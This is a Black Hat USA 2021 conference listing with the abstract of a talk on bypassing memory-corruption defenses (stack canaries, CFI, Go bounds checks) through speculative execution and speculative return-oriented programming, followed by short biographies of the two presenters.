The Dark Age of Memory Corruption Mitigations in the Spectre Era

Presented at Black Hat USA 2021, Aug. 4, 2021, 11:20 a.m. (40 minutes).

The prevalence of memory corruption bugs in the past decades resulted in numerous defenses, such as stack canaries, control flow integrity (CFI), and memory-safe languages. These defenses can prevent entire classes of vulnerabilities, and help increase the security posture of a program.

In this talk, we show that memory corruption defenses can be bypassed using speculative execution attacks. We study the cases of stack protectors, CFI, and bounds checks in Go, demonstrating under which conditions they can be bypassed by a form of speculative control flow hijack, relying on speculative or architectural overwrites of control flow data. Information is leaked by redirecting the speculative control flow of the victim to a gadget accessing secret data and acting as a side-channel send. We also demonstrate, for the first time, that this can be achieved by stitching together multiple gadgets, in a speculative return-oriented programming attack.


Presenters:

  • Andrea Mambretti - Systems Security Researcher, IBM Research Europe - Zurich
    Andrea Mambretti is a security research in the IBM Research Zurich laboratory. His interests are mainly on systems security, hardware security and side-channels. Andrea is completing his PhD at Northeastern University where he is advised by Engin Kirda. Also, he holds a Master's degree in Computer Engineering from Politecnico di Milano where he was advised by Federico Maggi and Stefano Zanero. His work has been published in major system security conferences such as IEEE S&P, NDSS and ACSAC.
  • Alexandra Sandulescu - Security Engineer, Google (formerly: IBM Research Europe - Zurich)
    Alexandra Sandulescu has been working in systems security research for several years and her research spans many topics including program analysis, fuzzing, microarchitectural attacks, and sandboxing. Her main contributions to the security community are complex features to a dynamic binary translator called RIVER and various offensive techniques used for exploiting microarchitectural attacks.

Links:

Similar Presentations: